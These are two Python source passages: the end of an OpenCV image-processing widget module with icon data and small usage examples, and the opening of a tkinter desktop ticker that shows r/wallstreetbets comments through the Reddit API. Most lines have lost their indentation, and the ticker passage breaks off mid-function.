cBHr5BFa6v7/7nXquTA0huAXpu6T5UrlT6lgJmK+KhxpW2XZc4G4rV46Zr+an57ql8rxzJn30jwXTnBUDuizPsZIlCncVk6DuJG6pKmU0e3kgxM2ffM7byfAS+ZWQEEFHbVJUxnGkgTCjeNrUsYJaeeF/X9PFhYhVo2nWlda9lwiAoh4qqMy///hxAWUa8lgocwD5wuRUOwfnM4Oro/ProITUCC2QoWQc0FBCihSmWovHKMgBRRcJQ/VFKyAIkqpzsgCZQIyU/0yzg5R1lQnTWWoEzA8/wIKL6xJmspQJqAWn38BBSIbq1yhKCukYdLaWlc9gXIhf6V1BQ+AyWcl6gQsEgo2C88NwP8A7JKh2GNdWekAAAAASUVORK5CYII="
@gui.decorate_constructor_parameter_types([cvt_types.keys()])
def __init__(self, conversion_code, *args, **kwargs):
self.conversion_code = self.cvt_types[conversion_code]
super(OpencvCvtColor, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
if emitter.img is None:
return
self.set_image_data(cv2.cvtColor(emitter.img, self.conversion_code))
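# --- added example: colorspace conversion through the cvt_types table (a sketch) ---
# The widget resolves the conversion code by name and hands it to cv2.cvtColor;
# the same lookup can be done directly. The input image is synthetic.
def _example_cvt_color():
    import cv2
    import numpy as np
    bgr = np.full((2, 2, 3), 128, dtype=np.uint8)
    gray = cv2.cvtColor(bgr, OpencvCvtColor.cvt_types['COLOR_BGR2GRAY'])
    assert gray.shape == (2, 2)
    return gray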
class OpencvBitwiseNot(OpencvImRead):
""" OpencvBitwiseNot widget.
Inverts an image mask.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = default_icon("BitwiseNot")
@gui.decorate_constructor_parameter_types([])
def __init__(self, *args, **kwargs):
super(OpencvBitwiseNot, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.set_image_data(cv2.bitwise_not(emitter.img))
except:
print(traceback.format_exc())
class BinaryOperator(object):
def __init__(self, **kwargs):
self.img1 = None
self.img2 = None
def process(self):
#overload this method to perform different operations
if not self.img1 is None:
if not self.img2 is None:
pass
def on_new_image_1_listener(self, emitter):
try:
self.img1 = emitter.img
self.process()
except:
print(traceback.format_exc())
def on_new_image_2_listener(self, emitter):
try:
self.img2 = emitter.img
self.process()
except:
print(traceback.format_exc())
class OpencvBitwiseAnd(OpencvImRead, BinaryOperator):
""" OpencvBitwiseAnd widget.
Computes the bitwise AND of two images.
- Receives the image on on_new_image_1_listener.
- Receives the mask on on_new_image_2_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = default_icon("BitwiseAND", 1.1)
@gui.decorate_constructor_parameter_types([])
def __init__(self, *args, **kwargs):
BinaryOperator.__init__(self)
super(OpencvBitwiseAnd, self).__init__("", *args, **kwargs)
def process(self):
if not self.img1 is None:
if not self.img2 is None:
self.set_image_data(cv2.bitwise_and(self.img1, self.img1, mask=self.img2))
class OpencvBitwiseOr(OpencvImRead, BinaryOperator):
""" OpencvBitwiseOr widget.
Computes the bitwise OR of two images.
- Receives the image on on_new_image_1_listener.
- Receives the mask on on_new_image_2_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = default_icon("BitwiseOR")
@gui.decorate_constructor_parameter_types([])
def __init__(self, *args, **kwargs):
BinaryOperator.__init__(self)
super(OpencvBitwiseOr, self).__init__("", *args, **kwargs)
def process(self):
if not self.img1 is None:
if not self.img2 is None:
self.set_image_data(cv2.bitwise_or(self.img1, self.img1, mask=self.img2))
class OpencvAddWeighted(OpencvImRead, BinaryOperator):
""" OpencvAddWeighted widget.
Computes the weighted sum (cv2.addWeighted) of two images.
- Receives the first image on on_new_image_1_listener.
- Receives the second image on on_new_image_2_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = "data:image/png;base64,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"
@gui.decorate_constructor_parameter_types([float, float, float])
def __init__(self, alpha, beta, gamma, *args, **kwargs):
self.alpha = alpha
self.beta = beta
self.gamma = gamma
BinaryOperator.__init__(self)
super(OpencvAddWeighted, self).__init__("", *args, **kwargs)
def process(self):
if not self.img1 is None:
if not self.img2 is None:
self.set_image_data(cv2.addWeighted(self.img1, self.alpha, self.img2, self.beta, self.gamma))
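# --- added example: cv2.addWeighted blending (illustrative values) ---
# addWeighted computes dst = src1*alpha + src2*beta + gamma, saturated to the
# image dtype, which is how the widget above mixes its two inputs.
def _example_add_weighted():
    import cv2
    import numpy as np
    a = np.full((2, 2), 100, dtype=np.uint8)
    b = np.full((2, 2), 200, dtype=np.uint8)
    dst = cv2.addWeighted(a, 0.5, b, 0.5, 0.0)
    assert int(dst[0, 0]) == 150        # 100*0.5 + 200*0.5 + 0
    return dst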
class OpencvBilateralFilter(OpencvImRead):
""" OpencvBilateralFilter widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
border_type = {"BORDER_CONSTANT": cv2.BORDER_CONSTANT,
"BORDER_REPLICATE": cv2.BORDER_REPLICATE,
"BORDER_REFLECT": cv2.BORDER_REFLECT,
"BORDER_WRAP": cv2.BORDER_WRAP,
"BORDER_REFLECT_101": cv2.BORDER_REFLECT_101,
"BORDER_TRANSPARENT": cv2.BORDER_TRANSPARENT,
"BORDER_REFLECT101": cv2.BORDER_REFLECT101,
"BORDER_DEFAULT": cv2.BORDER_DEFAULT,
"BORDER_ISOLATED": cv2.BORDER_ISOLATED}
icon = "data:image/png;base64,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"
@gui.decorate_constructor_parameter_types([int, float, float, border_type.keys()])
def __init__(self, diameter, sigma_color, sigma_space, border, *args, **kwargs):
self.sigma_color = sigma_color
self.sigma_space = sigma_space
self.diameter = diameter
self.border = self.border_type[border]
super(OpencvBilateralFilter, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
self.set_image_data(cv2.bilateralFilter(emitter.img, self.diameter, self.sigma_color, self.sigma_space, borderType=self.border))
except:
print(traceback.format_exc())
class OpencvBlurFilter(OpencvImRead):
""" OpencvBlurFilter widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = default_icon("Blur")
@gui.decorate_constructor_parameter_types([int, OpencvBilateralFilter.border_type.keys()])
def __init__(self, kernel_size, border, *args, **kwargs):
self.kernel_size = kernel_size
self.border = OpencvBilateralFilter.border_type[border]
super(OpencvBlurFilter, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
self.set_image_data(cv2.blur(emitter.img, (self.kernel_size,self.kernel_size), borderType=self.border))
except:
print(traceback.format_exc())
def on_kernel_size_listener(self, emitter, value=None):
v = emitter.get_value() if value is None else value
v = int(v)
self.kernel_size = v
if hasattr(self, "image_source"):
self.on_new_image_listener(self.image_source)
class OpencvDilateFilter(OpencvImRead):
""" OpencvDilateFilter widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
morph_shape = {"MORPH_RECT": cv2.MORPH_RECT, "MORPH_CROSS": cv2.MORPH_CROSS, "MORPH_ELLIPSE": cv2.MORPH_ELLIPSE}
icon = default_icon("Dilate")
@gui.decorate_constructor_parameter_types([morph_shape.keys(), int, int, OpencvBilateralFilter.border_type.keys()])
def __init__(self, kernel_morph_shape, kernel_size, iterations, border, *args, **kwargs):
self.kernel = cv2.getStructuringElement(self.morph_shape[kernel_morph_shape], (kernel_size, kernel_size))
self.iterations = iterations
self.border = OpencvBilateralFilter.border_type[border]
super(OpencvDilateFilter, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
self.set_image_data(cv2.dilate(emitter.img, self.kernel, iterations=self.iterations, borderType=self.border))
except:
print(traceback.format_exc())
class OpencvErodeFilter(OpencvImRead):
""" OpencvErodeFilter widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
morph_shape = {"MORPH_RECT": cv2.MORPH_RECT, "MORPH_CROSS": cv2.MORPH_CROSS, "MORPH_ELLIPSE": cv2.MORPH_ELLIPSE}
icon = default_icon("Erode")
@gui.decorate_constructor_parameter_types([morph_shape.keys(), int, int, OpencvBilateralFilter.border_type.keys()])
def __init__(self, kernel_morph_shape, kernel_size, iterations, border, *args, **kwargs):
self.kernel = cv2.getStructuringElement(self.morph_shape[kernel_morph_shape], (kernel_size, kernel_size))
self.iterations = iterations
self.border = OpencvBilateralFilter.border_type[border]
super(OpencvErodeFilter, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
self.set_image_data(cv2.erode(emitter.img, self.kernel, iterations=self.iterations, borderType=self.border))
except:
print(traceback.format_exc())
class OpencvLaplacianFilter(OpencvImRead):
""" OpencvLaplacianFilter widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = default_icon("Laplacian")
@gui.decorate_constructor_parameter_types([OpencvBilateralFilter.border_type.keys()])
def __init__(self, border, *args, **kwargs):
self.border = OpencvBilateralFilter.border_type[border]
super(OpencvLaplacianFilter, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
self.set_image_data(cv2.Laplacian(emitter.img, -1, borderType=self.border))
except:
print(traceback.format_exc())
class OpencvCanny(OpencvImRead):
""" OpencvCanny segmentation widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = default_icon("Canny")
@gui.decorate_constructor_parameter_types([int, int])
def __init__(self, threshold1, threshold2, *args, **kwargs):
self.threshold1 = threshold1
self.threshold2 = threshold2
super(OpencvCanny, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
self.set_image_data(cv2.Canny(emitter.img, self.threshold1, self.threshold2))
except:
print(traceback.format_exc())
def on_threshold1_listener(self, emitter, value=None):
v = emitter.get_value() if value is None else value
v = int(v)
self.threshold1 = v
if hasattr(self, "image_source"):
self.on_new_image_listener(self.image_source)
def on_threshold2_listener(self, emitter, value=None):
v = emitter.get_value() if value is None else value
v = int(v)
self.threshold2 = v
if hasattr(self, "image_source"):
self.on_new_image_listener(self.image_source)
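# --- added example: Canny hysteresis thresholds (a small sketch) ---
# cv2.Canny keeps gradients above threshold2, drops gradients below threshold1
# and keeps in-between values only when connected to a strong edge; the widget
# above simply forwards its two thresholds. The test image is synthetic.
def _example_canny():
    import cv2
    import numpy as np
    img = np.zeros((32, 32), dtype=np.uint8)
    img[:, 16:] = 255                   # a vertical step edge
    edges = cv2.Canny(img, 50, 150)
    assert edges.max() == 255           # the step is reported as an edge
    return edges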
#https://docs.opencv.org/3.4/d3/dc0/group__imgproc__shape.html
class OpencvFindContours(OpencvImRead):
""" OpencvFindContours segmentation widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
contour_retrieval_mode = {"RETR_LIST": cv2.RETR_LIST, "RETR_EXTERNAL": cv2.RETR_EXTERNAL, "RETR_CCOMP": cv2.RETR_CCOMP, "RETR_TREE": cv2.RETR_TREE, "RETR_FLOODFILL": cv2.RETR_FLOODFILL}
contour_approximation_method = {"CHAIN_APPROX_NONE":cv2.CHAIN_APPROX_NONE, "CHAIN_APPROX_SIMPLE": cv2.CHAIN_APPROX_SIMPLE, "CHAIN_APPROX_TC89_L1": cv2.CHAIN_APPROX_TC89_L1, "CHAIN_APPROX_TC89_KCOS": cv2.CHAIN_APPROX_TC89_KCOS}
icon = default_icon("FindContours",1.2)
@gui.decorate_constructor_parameter_types([contour_retrieval_mode.keys(), contour_approximation_method.keys()])
def __init__(self, retrieval_mode, approximation_method, *args, **kwargs):
self.retrieval_mode = self.contour_retrieval_mode[retrieval_mode]
self.approximation_method = self.contour_approximation_method[approximation_method]
super(OpencvFindContours, self).__init__("", *args, **kwargs)
self.on_new_contours_result.do = self.do_contours_result
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
if emitter.img is None:
return
major = cv2.__version__.split('.')[0]
img = emitter.img.copy()
if major == '3':
img, self.contours, self.hierarchy= cv2.findContours(emitter.img.copy(), self.retrieval_mode, self.approximation_method)
else:
self.contours, self.hierarchy= cv2.findContours(img, self.retrieval_mode, self.approximation_method)
img = cv2.drawContours(img, self.contours, -1, 255)
self.set_image_data(img)
self.on_new_contours_result()
except:
print(traceback.format_exc())
def do_contours_result(self, callback, *userdata, **kwuserdata):
#this method gets called when an event is connected, making it possible to execute the process chain directly, before the event triggers
if hasattr(self.on_new_contours_result.event_method_bound, '_js_code'):
self.on_new_contours_result.event_source_instance.attributes[self.on_new_contours_result.event_name] = self.on_new_contours_result.event_method_bound._js_code%{
'emitter_identifier':self.on_new_contours_result.event_source_instance.identifier, 'event_name':self.on_new_contours_result.event_name}
self.on_new_contours_result.callback = callback
self.on_new_contours_result.userdata = userdata
self.on_new_contours_result.kwuserdata = kwuserdata
#here the callback is called immediately to make it possible to link to the plc
if callback is not None: #protection against the callback replacements in the editor
callback(self, self.contours, self.hierarchy, *userdata, **kwuserdata)
@gui.decorate_set_on_listener("(self, emitter, contours, hierarchy)")
@gui.decorate_event
def on_new_contours_result(self):
return (self.contours, self.hierarchy)
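# --- added example: findContours across OpenCV versions (a sketch) ---
# OpenCV 3.x returns (image, contours, hierarchy) while 4.x returns
# (contours, hierarchy); the listener above branches on the major version for
# the same reason. The mask below is synthetic.
def _example_find_contours():
    import cv2
    import numpy as np
    mask = np.zeros((32, 32), dtype=np.uint8)
    cv2.rectangle(mask, (8, 8), (24, 24), 255, -1)   # one filled square
    result = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    contours = result[0] if len(result) == 2 else result[1]
    assert len(contours) == 1
    return cv2.boundingRect(contours[0])             # (x, y, w, h) of the square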
|
wsbticker.py
|
import praw
import json
import pprint
from datetime import datetime
import time
import threading
import tkinter as tk
from yahoofinancials import YahooFinancials
from tkinter import *
import webbrowser
import configparser
import os
from os import path
import tkinter.messagebox
config = configparser.ConfigParser()
config.read('wsbt_config.ini')
if not path.exists("praw.ini"):
tkinter.messagebox.showerror("Error", "The praw.ini file is not found. Please redownload the application.")
os._exit(1)
if not path.exists("gripbar.gif"):
tkinter.messagebox.showerror("Error", "The gripbar.gif file is not found. Please redownload the application.")
os._exit(1)
if 'SETTINGS' in config:
if 'screen_width' in config['SETTINGS']:
screen_width = int(config['SETTINGS']['screen_width'])
if 'stocks' in config['SETTINGS']:
stocks = config['SETTINGS']['stocks']
stocks = [x.strip() for x in stocks.split(',')]
if 'font_size' in config['SETTINGS']:
font_size = int(config['SETTINGS']['font_size'])
if 'theme' in config['SETTINGS']:
theme = config['SETTINGS']['theme']
try: screen_width
except NameError: screen_width = 1920
try: stocks
except NameError: stocks = ['AAPL', 'MSFT', 'LYFT', 'TSLA', 'GOOGL']
try: theme
except NameError: theme = 'blue'
if theme not in ['blue', 'black', 'white', 'mods']:
theme = 'blue'
try: font_size
except NameError: font_size = 20
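# --- added example: an illustrative wsbt_config.ini (values are assumptions) ---
# The settings read above come from a [SETTINGS] section; building the same
# structure with configparser shows the expected keys.
def _example_config():
    import configparser
    example = configparser.ConfigParser()
    example['SETTINGS'] = {
        'screen_width': '1920',
        'stocks': 'AAPL, MSFT, TSLA',   # comma-separated, split and stripped above
        'font_size': '20',
        'theme': 'black',               # one of: blue, black, white, mods
    }
    return example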
themecolors = {}
themecolors['blue'] = {'bg' : 'blue', 'fg' : 'white', 'user' : '#90ee90', 'mods' : 'pink'}
themecolors['black'] = {'bg' : 'black', 'fg' : 'gold', 'user' : '#90ee90', 'mods' : 'pink'}
themecolors['white'] = {'bg' : 'white', 'fg' : 'black', 'user' : 'green', 'mods' : 'pink'}
themecolors['mods'] = {'bg' : 'pink', 'fg' : 'yellow', 'user' : 'green', 'mods' : 'red'}
stock_dict = {}
comment_dict = {}
comments_in_queue = 0
ticker_paused = 0
tick_rate = 100
old_comments = []
stickies = []
mod_list = []
reddit = praw.Reddit(user_agent='WSB Ticker',
client_id='IniTKSLJs8hlfg', client_secret=None)
class App(tk.Tk):
def __init__(self):
tk.Tk.__init__(self)
self.floater = FloatingWindow(self)
class FloatingWindow(tk.Toplevel):
def __init__(self, *args, **kwargs):
tk.Toplevel.__init__(self, *args, **kwargs)
self.overrideredirect(True)
path = "gripbar.gif"
self.gripbar = tk.PhotoImage(file=path)
#self.label = tk.Label(self, text="Click on the grip to move")
self.grip = tk.Label(self, image=self.gripbar, width=25, height=25)
self.grip.pack_propagate(0)
self.grip.pack(side="left", fill="y")
#self.label.pack(side="right", fill="both", expand=True)
self.grip.bind("<ButtonPress-1>", self.StartMove)
self.grip.bind("<ButtonRelease-1>", self.StopMove)
self.grip.bind("<B1-Motion>", self.OnMotion)
self.popup_menu = tk.Menu(self, tearoff=0)
self.popup_menu.add_command(label="Pause", command=self.pauseTicker)
self.popup_menu.add_command(label="Resume", command=self.resumeTicker)
self.speed_submenu = tk.Menu(self.popup_menu)
self.speed_submenu.add_command(label="Slow", command=lambda: self.setSpeed(200))
self.speed_submenu.add_command(label="Med", command=lambda: self.setSpeed(100))
self.speed_submenu.add_command(label="Fast", command=lambda: self.setSpeed(50))
self.popup_menu.add_cascade(label='Tick Speed', menu=self.speed_submenu, underline=0)
self.theme_submenu = tk.Menu(self.popup_menu)
self.theme_submenu.add_command(label="Blue", command=lambda: self.setTheme('blue'))
self.theme_submenu.add_command(label="Black", command=lambda: self.setTheme('black'))
self.theme_submenu.add_command(label="White", command=lambda: self.setTheme('white'))
self.theme_submenu.add_command(label="Mods", command=lambda: self.setTheme('mods'))
self.popup_menu.add_cascade(label='Theme', menu=self.theme_submenu, underline=0)
self.popup_menu.add_command(label="Close",
command=self.destroy_root)
self.bind("<Button-3>", self.popup) # Button-2 on Aqua
def StartMove(self, event):
self.x = event.x
self.y = event.y
def StopMove(self, event):
self.x = None
self.y = None
def OnMotion(self, event):
deltax = event.x - self.x
deltay = event.y - self.y
x = self.winfo_x() + deltax
y = self.winfo_y() + deltay
self.geometry("+%s+%s" % (x, y))
def popup(self, event):
try:
self.popup_menu.tk_popup(event.x_root, event.y_root, 0)
finally:
self.popup_menu.grab_release()
def destroy_root(self):
global root
root.quit()
root.destroy()
os._exit(1)
def pauseTicker(self):
global ticker_paused
ticker_paused = 1
def resumeTicker(self):
global ticker_paused
ticker_paused = 0
def setSpeed(self, ts):
global tick_rate
tick_rate = ts
def setTheme(self, new_theme):
global theme
theme = new_theme
marquee.config(bg=themecolors[theme]['bg'], fg=themecolors[theme]['fg'])
def showLink(event):
webbrowser.open(event.widget.tag_names(CURRENT)[1])
def printLink(event):
print(event.widget.tag_names(CURRENT)[1])
root = App()
root.withdraw()
f = Frame(root.floater, height=font_size*1.4, width=screen_width-32)
root.floater.geometry("+0+800")
f.pack_propagate(0) # don't shrink
f.pack()
marquee = Text(f, bg=themecolors[theme]['bg'], fg=themecolors[theme]['fg'],font=("Lucida Console", font_size))
#marquee.bind("<Button-1>", showLink)
marquee.pack(fill=BOTH, expand=1)
root.floater.wm_attributes("-topmost", 1)
i = 0
def check_stickies():
global stickies
global stream
stickies = []
for submission in reddit.subreddit('wallstreetbets').hot(limit=5):
if submission.stickied:
stickies.append('t3_' +submission.id)
time.sleep(300)
def get_mods():
global mod_list
for moderator in reddit.subreddit('wallstreetbets').moderator():
mod_list.append(moderator)
def create_ticker(i):
global stream
global ticker_paused
global mod_list
if not ticker_paused:
cursor_position = 0
marquee.delete('1.0', END)
comment_count = 0
#Trim comment dict if it gets too long
if len(comment_dict) > 100:
print("Trimming comments")
for index, comment in enumerate(list(comment_dict)):
if index > 10 and index % 2 != 0:
del comment_dict[comment]
for comment in list(comment_dict):
if cursor_position < (screen_width/10):
if len(comment_dict[comment]['author']) > 0 or len(comment_dict[comment]['body']) > 0:
if len(comment_dict[comment]['author']) > 0:
if comment_dict[comment]['original_author'] in mod_list:
marquee.insert("1."+str(cursor_position), comment_dict[comment]['author'], ('author_is_mod', comment_dict[comment]['author_link']))
else:
marquee.insert("1."+str(cursor_position), comment_dict[comment]['author'], ('author', comment_dict[comment]['author_link']))
#marquee.tag_add("start", "1."+str(cursor_position), "1."+str(cursor_position + len(comment_dict[comment]['author'])))
cursor_position += len(comment_dict[comment]['author'])
marquee.insert("1."+str(cursor_position), comment_dict[comment]['body'], ('link', str(comment_dict[comment]['link'])))
cursor_position += len(comment_dict[comment]['body'])
else:
marquee.insert("1."+str(cursor_position), comment_dict[comment]['body'], ('link', str(comment_dict[comment]['link'])))
cursor_position += len(comment_dict[comment]['body'])
if comment_count == 0:
comment_count+=1
if len(comment_dict[comment]['author']) >0:
